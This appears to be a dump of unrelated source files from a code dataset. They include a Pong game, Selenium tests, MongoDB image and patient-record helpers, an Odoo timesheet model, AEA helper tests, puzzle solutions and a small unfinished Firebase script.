def set_paddle_up(self):\n        \"\"\"\n        Set the paddle to move up\n        \"\"\"\n        self.paddle_up = True\n\n    def set_paddle_down(self):\n        \"\"\"\n        Set the paddle to move down\n        \"\"\"\n        self.paddle_down = True\n\n    def stop_paddle(self):\n        \"\"\"\n        Stops the paddle from moving\n        \"\"\"\n        self.paddle_up = self.paddle_down = False\n\n    def update(self):\n        \"\"\"\n        This is the method that actually moves the paddle\n        \"\"\"\n        if self.y > 0 and self.paddle_up:\n            self.y -= self.dy\n\n        if (self.y + self.h) < SCREEN_HEIGHT and self.paddle_down:\n            self.y += self.dy\n\n    def draw(self):\n        \"\"\"\n        Draws the paddle\n        \"\"\"\n        self.bounding_box = pygame.draw.rect(SCREEN, self.color, (self.x, self.y, self.w, self.h))\n\nclass Ball(object):\n    \"\"\"\n    A very simple ball to represent the ball\n    \"\"\"\n    # there's a 
lot of room for improvement here, left as an\n    # exercise to the reader\n    def __init__(self):\n        self.radius = 10\n        self.color = (0, 0, 255)\n        self.reset()\n        self.draw()\n\n    def reset(self):\n        \"\"\"\n        Resets the ball to its start position in the middle of the screen\n        and gives it an initial velocity in x and y\n        \"\"\"\n        # so that it is truly centered\n        self.x = (SCREEN_WIDTH / 2) - self.radius\n        self.y = (SCREEN_HEIGHT / 2) - self.radius\n        self.dx = random.randint(-3, 3) # there's a bug in this line, find a way to fix it\n        self.dy = random.randint(-6, 6)\n\n    def update(self):\n        \"\"\"\n        Updates the position of the ball\n        \"\"\"\n        self.x += self.dx\n        self.y += self.dy\n        if self.y < 0 or (self.y+self.radius) > SCREEN_HEIGHT:\n            self.dy = -self.dy\n        # we would like to check this for the scoring in the future\n        if self.x < 0 or (self.x+self.radius) > SCREEN_WIDTH:\n            self.reset()\n\n    def check_collisions(self, paddle):\n        \"\"\"\n        Check collision against a paddle\n        \"\"\"\n        # what else can we do here???\n        if self.bounding_box.colliderect(paddle.bounding_box):\n            self.dx = -self.dx\n\n    def draw(self):\n        \"\"\"\n        Draws the ball onto the screen\n        \"\"\"\n        self.bounding_box = pygame.draw.circle(SCREEN, self.color, (self.x, self.y), self.radius)\n\ndef game_loop():\n    # create the players\n    player1 = Paddle(40, SCREEN_HEIGHT/2 - 50)\n    player2 = Paddle(SCREEN_WIDTH-50, SCREEN_HEIGHT/2-50, (0, 255, 0))\n    # create the ball\n    ball = Ball()\n    # background\n    background = pygame.Surface(SCREEN.get_size())\n    background.fill((0, 0, 0))\n    while True:\n        # get events\n        # can we think of a better way to manage these events?\n        # an event manager object??? \n        for event in pygame.event.get():\n            # print(event)\n            if event.type == QUIT:\n                sys.exit(0)\n            if event.type == KEYDOWN:\n                if event.key == K_w:\n                    player1.set_paddle_up()\n                if event.key == K_s:\n                    player1.set_paddle_down()\n                if event.key == K_UP:\n                    player2.set_paddle_up()\n                if event.key == K_DOWN:\n                    player2.set_paddle_down()\n            if event.type == KEYUP:\n                if event.key == K_w or event.key == K_s:\n                    player1.stop_paddle()\n                if event.key == K_UP or event.key == K_DOWN:\n                    player2.stop_paddle()\n        # clear the SCREEN\n        SCREEN.blit(background, (0, 0))\n        # update things\n        player1.update()\n        player2.update()\n        # check for ball collisions\n        ball.check_collisions(player1)\n        ball.check_collisions(player2)\n        ball.update()\n        # draw things\n        player1.draw()\n        player2.draw()\n        ball.draw()\n        # tick the clock\n        CLOCK.tick(FRAMERATE)\n        # flip the display\n        pygame.display.flip()\n\nif __name__ == '__main__':\n    game_loop()\n","sub_path":"class_5/code/pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":5129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"465307046","text":"import pytest\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium import webdriver\n\nline = 'http://selenium1py.pythonanywhere.com/'\n\n\n\ndef test_exception1():\n    try:\n        browser = webdriver.Chrome()\n        browser.get(line)\n        with pytest.raises(NoSuchElementException):\n            browser.find_element(By.CSS_SELECTOR, 'button.btn')\n            pytest.fail('The button should not be present')\n    finally:\n        browser.quit()\n\n\ndef test_exception2():\n    try:\n        browser = webdriver.Chrome()\n        browser.get(line)\n        with pytest.raises(NoSuchElementException):\n            browser.find_element(By.CSS_SELECTOR, 'no_such_button.btn')\n            pytest.fail('The Submit button should not be present')\n    finally:\n        
browser.quit()","sub_path":"test_frameworks/lessons/test_lessons_two.py","file_name":"test_lessons_two.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"396595504","text":"from lib.image import *\nfrom lib.useInfo import *\nfrom lib.db import *\nfrom etc.config import *\nfrom gridfs import *\nfrom bson import ObjectId\n\ndef InsertImage(path, filename, process_times, origin_fileid):\n    image = Image(path, filename, process_times, origin_fileid)\n    mongo = MongoDB(configs['DB']['HOST'], configs['DB']['PORT'], configs['DB']['NAME'])\n    db = mongo.GetDB()\n    gfs = GridFS(db)\n    # open the file and read its data\n    img = open(image.GetPath() + image.GetFilename(), 'rb')\n    data = img.read()\n    img.close()\n    # store the data in MongoDB via GridFS\n    gfs.put(data, filename = image.GetFilename(), process_times = image.GetProcessTimes(), origin_fileid = image.GetOriginFileid())\n    # close the database connection\n    mongo.Close()\n\ndef DeleteImage(dict):\n    mongo = MongoDB(configs['DB']['HOST'], configs['DB']['PORT'], configs['DB']['NAME'])\n    db = mongo.GetDB()\n\n    if dict is None:\n        db.fs.files.remove()\n        db.fs.chunks.remove()\n        mongo.Close()\n        return\n\n    gfs = GridFS(db)\n\n    files = db['fs.files']\n    fileList = files.find(dict)\n\n    for file in fileList:\n        id = file['_id']\n        gfs.delete(ObjectId(id))\n\n    mongo.Close()\n\n# delete all images\ndef DeleteAllImage():\n    DeleteImage(None)\n\ndef FindImage(dict):\n    mongo = MongoDB(configs['DB']['HOST'], configs['DB']['PORT'], configs['DB']['NAME'])\n    db = mongo.GetDB()\n    gfs = GridFS(db)\n\n    files = db.fs.files\n    fileList = files.find(dict)\n\n    for file in fileList:\n        id = file['_id']\n        data = gfs.get(ObjectId(id))\n        f = open(configs['IMAGE']['FIND_RESULT_PATH'] + str(id) + configs['IMAGE']['EXT_NAME'], 'wb')\n        f.write(data.read())\n        f.close()\n\n    mongo.Close()\n\ndef FindImageById(id):\n    dict = {}\n    dict['_id'] = id\n    FindImage(dict)\n\ndef FindImageByFilename(filename):\n    dict = {}\n    dict['filename'] = filename\n    FindImage(dict)\n\ndef InsertPatientInfo(origin_image_id, patientId, patientName = \"\", patientBirthDate = \"\",\n                      patientSex = \"\", studyId = \"\", studyTime = \"\",studyDate = \"\",\n                      institutionName = \"\", maufacturer = \"\", numberOfFrames = \"\"):\n\n    patient = Patient(patientId, patientName, patientBirthDate, patientSex, studyId, studyTime,studyDate,institutionName, maufacturer, numberOfFrames)\n    mongo = MongoDB(configs['DB']['HOST'], configs['DB']['PORT'], configs['DB']['NAME'])\n    db = mongo.GetDB()\n    collection = db[configs['PATIENT_COLLECTION_NAME']] # if the collection does not exist, it is created automatically on the first insert\n\n    # store the patient info in a dict\n    patientInfo = {}\n    patientInfo['patientId'] = patient.GetPatientId()\n    patientInfo['patientName'] = patient.GetPatientName()\n    patientInfo['patientBirthDate'] = patient.GetPatientBirthDate()\n    patientInfo['patientSex'] = patient.GetPatientSex()\n    patientInfo['studyId'] = patient.GetStudyId()\n    patientInfo['studyTime'] = patient.GetStudyTime()\n    patientInfo['institutionName'] = patient.GetInstitutionName()\n    patientInfo['maufacturer'] = patient.GetMaufacturer()\n    patientInfo['numberOfFrames'] = patient.GetNumberOfFrames()\n    patientInfo['studyDate'] = patient.GetStudyDate()\n    patientInfo['origin_image_id'] = origin_image_id\n\n    # insert\n    collection.insert(patientInfo)\n    mongo.Close()\n\ndef FindPatientInfo(dict):\n    mongo = MongoDB(configs['DB']['HOST'], configs['DB']['PORT'], configs['DB']['NAME'])\n    db = mongo.GetDB()\n    collection = db[configs['PATIENT_COLLECTION_NAME']]\n\n    res = collection.find(dict)\n    mongo.Close()\n    return res\n\ndef UpdataPatientInfo(dict1, 
dict2):\n    mongo = MongoDB(configs['DB']['HOST'], configs['DB']['PORT'], configs['DB']['NAME'])\n    db = mongo.GetDB()\n    collection = db[configs['PATIENT_COLLECTION_NAME']]\n\n    tmp = {}\n    tmp['$set'] = dict2\n    collection.update(dict1, tmp)\n\n    mongo.Close()\n\ndef DeletePatientInfo(dict):\n    mongo = MongoDB(configs['DB']['HOST'], configs['DB']['PORT'], configs['DB']['NAME'])\n    db = mongo.GetDB()\n    collection = db[configs['PATIENT_COLLECTION_NAME']]\n\n    if dict is None:\n        collection.remove()\n        mongo.Close()\n        return\n\n    collection.remove(dict)\n    mongo.Close()\n\ndef DeleteAllPatientInfo():\n    DeletePatientInfo(None)\n","sub_path":"mongodb.py","file_name":"mongodb.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"400689253","text":"\ndef calc(a, b):\n    \"\"\"Partially WA (wrong answer)\"\"\"\n    # find the range of x whose floors give a and b\n    l = 1 - 1e-9\n    x1_range = [v / 0.08 for v in (a+1-l, a, a+l)]\n    x2_range = [v / 0.10 for v in (b+1-l, b, b+l)]\n    x1_range = range(round(min(x1_range)), round(max(x1_range)))\n    x2_range = range(round(min(x2_range)), round(max(x2_range)))\n    # if the two ranges overlap, return the smallest value; otherwise return -1\n    if (min(x1_range) in x2_range) and (min(x2_range) in x1_range):\n        return min(x1_range)\n    if (min(x1_range) in x2_range) and not (min(x2_range) in x1_range):\n        return min(x1_range)\n    if not (min(x1_range) in x2_range) and (min(x2_range) in x1_range):\n        return min(x2_range)\n    return -1\n\n\ndef calc(a, b):\n    \"\"\"The model answer used brute force, so this is the brute-force version\"\"\"\n    from math import floor\n    for x in range(1, 1251):\n        a_ = floor(x * 0.08)\n        b_ = floor(x * 0.10)\n        if (a == a_) and (b == b_):\n            return x\n    return -1\n\n\na, b = map(int, input().split())\nprint(calc(a, b))\n","sub_path":"atcoder-problems/easy-57.py","file_name":"easy-57.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"29368053","text":"from odoo import api, fields, models, _\nfrom odoo.exceptions import AccessError, UserError, RedirectWarning, ValidationError, Warning\nfrom ..services.datahandler import DataHandler\nimport datetime\nclass Timesheet(models.Model):\n    _inherit = 'account.analytic.line'\n\n    ## Remove unnecessary attributes\n\n    task_id = fields.Many2one('project.task', 'Task', index=True)\n\n    project_id = fields.Many2one('project.project', 'Project', domain=[('allow_timesheets', '=', True)])\n\n    employee_id = fields.Many2one('hr.employee', \"Employee\")\n\n    last_modified = fields.Datetime()\n\n    assignee_id = fields.Many2one('hr.employee', \"Employee\")\n\n    jiraKey = fields.Char()\n\n    @api.model\n    def auto_gen_new_line(self):\n        taskDB = self.env['project.task'].sudo()\n        task_records = taskDB.search([])\n\n        username = self.env.user['login']\n        employee_DB = self.env['hr.employee'].sudo()\n        employee = employee_DB.search([('name','=',username)])\n\n        for record in task_records:\n            print(\"hello : \",record.project_id.id)\n            self.env['account.analytic.line'].create({\n                'task_id': record.id,\n                'project_id': record.project_id.id,\n                'employee_id': employee.id,\n                'unit_amount': 0,\n                'name': \"test\",\n                'date': datetime.datetime.now() + datetime.timedelta(7),\n            })\n\n\n    @api.model\n    def auto_sync_data(self):\n        dataHandler = DataHandler(self.env.user['login'])\n\n        try:\n            dataHandler.sync_data_from_jira()\n        except Exception as e:\n            print(e)\n\n    @api.multi\n    def button_sync(self):\n\n        dataHandler = DataHandler(self.env.user['login'])\n\n        try:\n            dataHandler.sync_data_from_jira()\n        except Exception as e:\n            
print(e)\n\n\n\n    # if fail_sync_jira:\n    #     raise Warning(_(\"problem raised during sync\"))\n\n\n    @api.model\n    def create(self, val):\n\n        # put the Jira sync code here\n        # if it fails, show a popup\n\n        return super(Timesheet,self).create(val)\n\n\n    @api.multi\n    def write(self, val):\n\n        # put the Jira sync code here\n\n        return super(Timesheet,self).write(val)\n\n","sub_path":"models/hr_timesheet.py","file_name":"hr_timesheet.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"82058300","text":"from part1c.zooanimals import *\nfrom part1c.zookeeper import *\nfrom part1c.zooannouncer import *\n\n\n### Felines ###\ncharlie = Cat(\"Charlie\")\nchloe = Cat(\"Chloe\")\nchris = Cat(\"Chris\")\n\ntom = Tiger(\"Tom\")\nted = Tiger(\"Ted\")\n\nlucas = Lion(\"Lucas\")\nlincoln = Lion(\"Lincoln\")\n\nanimal_list = [charlie, chloe, chris, tom, ted, lucas, lincoln]\n\n### Pachyderms ###\nevan = Elephant(\"Evan\")\nerik = Elephant(\"Erik\")\n\nhiro = Hippo(\"Hiro\")\nhillary = Hippo(\"Hillary\")\nhibai = Hippo(\"Hibai\")\n\nriley = Rhino(\"Riley\")\nrobert = Rhino(\"Robert\")\n\nanimal_list.extend([evan, erik, hiro, hillary, hibai, riley, robert])\n\n### Canines ###\nwilliam = Wolf(\"William\")\nwayne = Wolf(\"Wayne\")\n\ndave = Dog(\"Dave\")\ndaniel = Dog(\"Daniel\")\ndrew = Dog(\"Drew\")\ndot = Dog(\"Dot\")\n\nanimal_list.extend([william, wayne, dave, daniel, drew, dot])\n\n### Fish ###\ntracy = Trout(\"Tracy\")\ntrump = Trout(\"Trump\")\n\nkelly = Koi(\"Kelly\")\nkate = Koi(\"Kate\")\nkevin = Koi(\"Kevin\")\n\nbob = Bass(\"Bob\")\nbailey = Bass(\"Bailey\")\n\nanimal_list.extend([tracy, trump, kelly, kate, kevin, bob, bailey])\n\n### Birds ###\nolivia = Owl(\"Olivia\")\noscar = Owl(\"Oscar\")\n\nsteve = Sparrow(\"Steve\")\nsam = Sparrow(\"Sam\")\n\npaul = Penguin(\"Paul\")\npolly = Penguin(\"Polly\")\npeter = Penguin(\"Peter\")\npiers = Penguin(\"Piers\")\n\nanimal_list.extend([olivia, oscar, steve, sam, paul, polly, peter, piers])\n\n### zooannouncers ###\nzanc1 = ZooAnnouncer(\"Number#1\")\nzanc2 = ZooAnnouncer(\"Number#2\")\n\n### zookeeper ###\nzkp = Zookeeper()\n\nzkp.listObservers()\n\nzkp.registerObserver(zanc1)\nzkp.registerObserver(zanc2)\n\nzkp.listObservers()\n\nzkp.wakeAnimals(animal_list)\nzkp.rollCallAnimals(animal_list)\nzkp.feedAnimals(animal_list)\nzkp.exerciseAnimals(animal_list)\nzkp.shutDownZoo(animal_list)\n\nzkp.removeObserver(zanc1)\nzkp.removeObserver(zanc2)\n\nzkp.listObservers()\n\ndel zanc1\ndel zanc2\n","sub_path":"part1c/managezoo.py","file_name":"managezoo.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"145196635","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# 
------------------------------------------------------------------------------\n\"\"\"This module contains the tests for the helper module.\"\"\"\n\nimport io\nimport os\nimport platform\nimport re\nimport signal\nimport time\nfrom collections import OrderedDict\nfrom pathlib import Path\nfrom subprocess import Popen # nosec\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom aea.configurations.base import ConnectionConfig\nfrom aea.helpers.base import (\n MaxRetriesError,\n RegexConstrainedString,\n exception_log_and_reraise,\n load_aea_package,\n load_env_file,\n load_module,\n locate,\n retry_decorator,\n send_control_c,\n try_decorator,\n win_popen_kwargs,\n yaml_dump,\n yaml_load,\n)\n\nfrom packages.fetchai.connections.oef.connection import OEFConnection\n\nfrom tests.conftest import CUR_PATH, ROOT_DIR, skip_test_windows\n\n\nclass TestHelpersBase:\n \"\"\"Test the helper functions.\"\"\"\n\n def test_locate(self):\n \"\"\"Test the locate function to locate modules.\"\"\"\n cwd = os.getcwd()\n os.chdir(os.path.join(CUR_PATH, \"..\"))\n gym_package = locate(\n \"packages.fetchai.connections.gym.connection.GymConnection\"\n )\n non_existing_package = locate(\n \"packages.fetchai.connections.non_existing_connection\"\n )\n os.chdir(cwd)\n assert gym_package is not None\n assert non_existing_package is None\n\n def test_locate_class(self):\n \"\"\"Test the locate function to locate classes.\"\"\"\n cwd = os.getcwd()\n os.chdir(os.path.join(CUR_PATH, \"..\"))\n expected_class = OEFConnection\n actual_class = locate(\n \"packages.fetchai.connections.oef.connection.OEFConnection\"\n )\n os.chdir(cwd)\n # although they are the same class, they are different instances in memory\n # and the build-in default \"__eq__\" method does not compare the attributes.\n # so compare the names\n assert actual_class is not None\n assert expected_class.__name__ == actual_class.__name__\n\n def test_locate_with_builtins(self):\n \"\"\"Test that locate function returns the built-in.\"\"\"\n result = locate(\"int.bit_length\")\n assert int.bit_length == result\n\n def test_locate_when_path_does_not_exist(self):\n \"\"\"Test that locate function returns None when the dotted path does not exist.\"\"\"\n result = locate(\"aea.not.existing.path\")\n assert result is None\n\n result = locate(\"ThisClassDoesNotExist\")\n assert result is None\n\n\ndef test_regex_constrained_string_initialization():\n \"\"\"Test we can initialize a regex constrained with the default regex.\"\"\"\n RegexConstrainedString(\"\")\n RegexConstrainedString(\"abcde\")\n RegexConstrainedString(b\"\")\n RegexConstrainedString(b\"abcde\")\n RegexConstrainedString(RegexConstrainedString(\"\"))\n RegexConstrainedString(RegexConstrainedString(\"abcde\"))\n\n\ndef test_yaml_dump_load():\n \"\"\"Test yaml dump/load works.\"\"\"\n data = OrderedDict({\"a\": 12, \"b\": None})\n stream = io.StringIO()\n yaml_dump(data, stream)\n stream.seek(0)\n loaded_data = yaml_load(stream)\n assert loaded_data == data\n\n\ndef test_load_aea_package():\n \"\"\"Test aea package load.\"\"\"\n config = ConnectionConfig(\"http_client\", \"fetchai\", \"0.5.0\")\n config.directory = Path(ROOT_DIR) / \"packages\"\n load_aea_package(config)\n\n\ndef test_load_module():\n \"\"\"Test load module from filepath and dotted notation.\"\"\"\n load_module(\n \"packages.fetchai.connections.gym.connection\",\n Path(ROOT_DIR)\n / \"packages\"\n / \"fetchai\"\n / \"connections\"\n / \"gym\"\n / \"connection.py\",\n )\n\n\ndef test_load_env_file():\n \"\"\"Test load env file 
updates process environment variables.\"\"\"\n load_env_file(Path(ROOT_DIR) / \"tests\" / \"data\" / \"dot_env_file\")\n assert os.getenv(\"TEST\") == \"yes\"\n\n\ndef test_reg_exp_not_match():\n \"\"\"Test regexp checks.\"\"\"\n # for pydocstyle\n class MyReString(RegexConstrainedString):\n REGEX = re.compile(r\"[0-9]+\")\n\n with pytest.raises(ValueError):\n MyReString(\"anystring\")\n\n\ndef test_try_decorator():\n \"\"\"Test try and log decorator.\"\"\"\n # for pydocstyle\n @try_decorator(\"oops\", default_return=\"failed\")\n def fn():\n raise Exception(\"expected\")\n\n assert fn() == \"failed\"\n\n\ndef test_retry_decorator():\n \"\"\"Test auto retry decorator.\"\"\"\n num_calls = 0\n retries = 3\n\n @retry_decorator(retries, \"oops. expected\")\n def fn():\n nonlocal num_calls\n num_calls += 1\n raise Exception(\"expected\")\n\n with pytest.raises(MaxRetriesError):\n fn()\n assert num_calls == retries\n\n\ndef test_log_and_reraise():\n \"\"\"Test log and reraise context manager.\"\"\"\n log_msg = None\n\n def fn(msg):\n nonlocal log_msg\n log_msg = msg\n\n with pytest.raises(ValueError):\n with exception_log_and_reraise(fn, \"oops\"):\n raise ValueError()\n\n assert log_msg == \"oops\"\n\n\n@skip_test_windows\ndef test_send_control_c_group():\n \"\"\"Test send control c to process group.\"\"\"\n # Can't test process group id kill directly,\n # because o/w pytest would be stopped.\n process = Popen([\"sleep\", \"1\"]) # nosec\n pgid = os.getpgid(process.pid)\n time.sleep(0.1)\n with patch(\"os.killpg\") as mock_killpg:\n send_control_c(process, kill_group=True)\n process.communicate(timeout=3)\n mock_killpg.assert_called_with(pgid, signal.SIGINT)\n\n\ndef test_send_control_c():\n \"\"\"Test send control c to process.\"\"\"\n # Can't test process group id kill directly,\n # because o/w pytest would be stopped.\n process = Popen( # nosec\n [\"timeout\" if platform.system() == \"Windows\" else \"sleep\", \"5\"],\n **win_popen_kwargs()\n )\n time.sleep(0.001)\n send_control_c(process)\n process.communicate(timeout=3)\n assert process.returncode != 0\n\n\n@skip_test_windows\ndef test_send_control_c_windows():\n \"\"\"Test send control c on Windows.\"\"\"\n process = Popen( # nosec\n [\"timeout\" if platform.system() == \"Windows\" else \"sleep\", \"5\"]\n )\n time.sleep(0.001)\n pid = process.pid\n with patch(\"aea.helpers.base.signal\") as mock_signal:\n mock_signal.CTRL_C_EVENT = \"mock\"\n with patch(\"platform.system\", return_value=\"Windows\"):\n with patch(\"os.kill\") as mock_kill:\n send_control_c(process)\n mock_kill.assert_called_with(pid, mock_signal.CTRL_C_EVENT)\n","sub_path":"tests/test_helpers/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":7174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"495107052","text":"import numpy as np\nimport h5py\n\ndef inpute(path, split):\n if split == 'train':\n h5file = h5py.File(path + '.h5', 'r')\n read_data = h5file['train_data'][...]#得到的是一个HDF5的dataset,并不是array\n read_labels = h5file['train_labels'][...]\n read_mask = h5file['train_mask'][...]\n read_data = np.array(read_data, dtype=np.float32)\n read_labels = np.array(read_labels, dtype=np.float32)\n read_mask = np.array(read_mask, dtype=np.float32)\n return read_data, read_labels, read_mask\n\n elif split == 'test':\n h5file = h5py.File(path + '.h5', 'r')\n read_data = h5file['test_data'][...]\n read_labels = h5file['test_labels'][...]\n return read_data, read_labels\n\n\ndef process(read_data, 
read_labels, read_mask):\n batch = 16 # number of images fed in per batch\n size = 64\n\n data_cases, data_height, data_width, data_channels = read_data.shape\n labels_cases, labels_height, labels_width, labels_channels = read_labels.shape\n mask_cases, mask_height, mask_width, mask_channels = read_mask.shape\n # np.random.random_integers was removed from NumPy; randint is the replacement (its upper bound is exclusive)\n rand_index = np.random.randint(0, data_cases, size=batch)\n rand_index.sort()\n data = read_data[rand_index, :, :, :]\n labels = read_labels[rand_index, :, :, :]\n mask = read_mask[rand_index, :, :, :]\n crops_x = np.random.randint(0, high=data_height - size + 1, size=batch)\n crops_y = np.random.randint(0, high=data_width - size + 1, size=batch)\n random_cropped_data = np.zeros((batch, size, size, data_channels), dtype=np.float32)\n random_cropped_labels = np.zeros((batch, size, size, labels_channels), dtype=np.float32)\n random_cropped_mask = np.zeros((batch, size, size, labels_channels), dtype=np.float32)\n\n for i in range(batch):\n random_cropped_data[i, :, :, :] = data[i, crops_x[i]: (crops_x[i] + size), crops_y[i]: (crops_y[i] + size), :]\n random_cropped_labels[i, :, :, :] = labels[i, (crops_x[i]):(crops_x[i] + size), (crops_y[i]):(crops_y[i] + size), :]\n random_cropped_mask[i, :, :, :] = mask[i, crops_x[i]: (crops_x[i] + size), crops_y[i]: (crops_y[i] + size), :]\n\n return random_cropped_data, random_cropped_labels, random_cropped_mask\n\n\ndef inpute_test(path):\n h5file = h5py.File(path + '.h5', 'r')\n read_data = h5file['train_data'][...]\n read_data = np.array(read_data, dtype=np.float32)\n\n return read_data\n\n\n","sub_path":"data_inpute_mask.py","file_name":"data_inpute_mask.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"441718006","text":"from api.model_unofficial_api import ModelBasedOnUnofficialAPI\nfrom view.view_command_line import ViewCommandLineBased\nfrom view.view_to_model_adapter import ViewToModelAdapter\n\n\nclass BasicController:\n\n def __init__(self):\n self.model = ModelBasedOnUnofficialAPI()\n view_to_model_adapter = ViewToModelAdapter(self.model)\n self.view = ViewCommandLineBased(view_to_model_adapter)\n\n def run(self):\n self.view.run()\n\n\nif __name__ == '__main__':\n controller = BasicController()\n controller.run()\n","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"392051694","text":"from itertools import zip_longest\n\ndef find_start(text, word):\n\n    start_pos = text.find(word)\n    if start_pos >= 0:\n        line_number = text.count('\\n', 0, start_pos)\n        line_start = text.rfind('\\n', 0, start_pos)\n        row_start = line_number + 1\n        column_start = start_pos - line_start\n        return row_start, column_start\n\ndef checkio(text, word):\n    text = text.replace(' ', '').lower()\n    distance = len(word) - 1\n    start = find_start(text, word)\n    if start:\n        row_start, column_start = start\n        return [row_start, column_start, row_start, column_start + distance]\n    else:\n        text = '\\n'.join(''.join(x) for x in zip_longest(*text.split('\\n'), fillvalue=''))\n        start = find_start(text, word)\n        column_start, row_start = start\n        return [row_start, column_start, row_start + distance, column_start]\n\n# These \"asserts\" are only for self-checking and are not necessary for auto-testing\nif __name__ == '__main__':\n    assert checkio(\"\"\"DREAMING of apples on a wall,\nAnd dreaming often, dear,\nI dreamed that, if I counted all,\n-How many 
would appear?\"\"\", \"ten\") == [2, 14, 2, 16]\n assert checkio(\"\"\"He took his vorpal sword in hand:\nLong time the manxome foe he sought--\nSo rested he by the Tumtum tree,\nAnd stood awhile in thought.\nAnd as in uffish thought he stood,\nThe Jabberwock, with eyes of flame,\nCame whiffling through the tulgey wood,\nAnd burbled as it came!\"\"\", \"noir\") == [4, 16, 7, 16]\nprint(\"Coding complete? Click 'Check' to earn cool rewards!\")\n","sub_path":"The Hidden Word/mission.py","file_name":"mission.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"573411305","text":"import pyrebase\n\nfirebaseConfig = {\n 'apiKey': \"AIzaSyBQwup5w7OoBcSrn8_ggVivckCJ2TSN3AQ\",\n 'authDomain': \"fundpak-531e2.firebaseapp.com\",\n 'projectId': \"fundpak-531e2\",\n 'storageBucket': \"fundpak-531e2.appspot.com\",\n 'messagingSenderId': \"588369785043\",\n 'appId': \"1:588369785043:web:b0a25f4da16f657302e426\",\n 'measurementId': \"G-1NZH718QKV\",\n 'databaseURL': 'https://fundpak-531e2.firebaseio.com'\n}\n\n\nfirebase = pyrebase.initialize_app(firebaseConfig)\nauthf = firebase.auth()\nauthf.sign_in_with_email_and_password()\n\n#\n# db = firebase.database()\n# db.child(\"users\").child(\"23P4V4uBbWamCeLw3kUUtcrW47y1\").child(\"email\").get()\n\n\nimport firebase_admin\nfrom firebase_admin import credentials, firestore\n\ncred = credentials.Certificate(\"./fundpak-531e2-firebase-adminsdk-x9xtf-fa810f22e3.json\")\nfirebase_admin.initialize_app(cred)\n\ndb = firestore.client()\ndb.collection(\"users\").document(user['localId'])","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"15743727","text":"from django.conf.urls import url\nfrom . 
import views\n\n\n\nurlpatterns = [\n\n\turl(r'^start$',views.startorder, name='start'),\n\turl(r'^end/$',views.endorder, name='end'),\n\turl(r'^merci/$', views.terminer, name='terminer'),\n\t]\n","sub_path":"simpleorder/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"376257340","text":"#########################################################################################################################################################################\n# Author : Remi Monthiller, remi.monthiller@etu.enseeiht.fr\n# Adapted from the code of Raphael Maurin, raphael.maurin@imft.fr\n# 30/10/2018\n#\n# Incline plane simulations\n#\n#########################################################################################################################################################################\n\n# import lib\nimport os\nimport matplotlib.pyplot as plt\n\n# import params\nexecfile('params.py')\n\n# Simulation\ntry:\n\tdatas = os.listdir(\"data\")\nexcept:\n\tos.mkdir(\"data\")\n\tdatas = False\nif datas:\n\tfor i in range(len(datas)):\n\t\tdatas[i] = float(datas[i].split(\".yade\")[0])\n\tdatas.sort()\n\t# import PyRunners\n\texecfile('framework.py')\n\texecfile('../common/simulationPyRunners.py')\n\tO.load(\"data/\"+str(datas[-1])+\".yade\")\n\t# Reload parameters\n\texecfile('params.py')\n\tif pN.enable_new_engines:\n\t\texecfile('../common/simulationDefinition.py')\n\t\tfor e in O.engines:\n\t\t\tdel e\n\t\tsim.engineCreation()\n\t\t#sim.init()\n\t\t#O.resetTime()\n\t\tO.saveTmp()\n\tO.run()\nelse:\n\t# import simulation\n\texecfile('framework.py')\n\texecfile('../common/simulationDefinition.py')\n\tsim.simulation()\n\tO.run()\nO.wait()\n","sub_path":"common/caseBatch.py","file_name":"caseBatch.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"460838460","text":"#Read-in script for 2007 brief summary text\n# Importing necessary packages.\nimport os\nimport zipfile as zip\nimport pandas as pd\nimport csv\nimport numpy as np\n\n# Set up file path:\n# Please include the folder path of the file you are reading. 
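The os.chdir(\"\") placeholder below is intentionally blank; point it at the folder that holds the zip before running (editor's note). 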
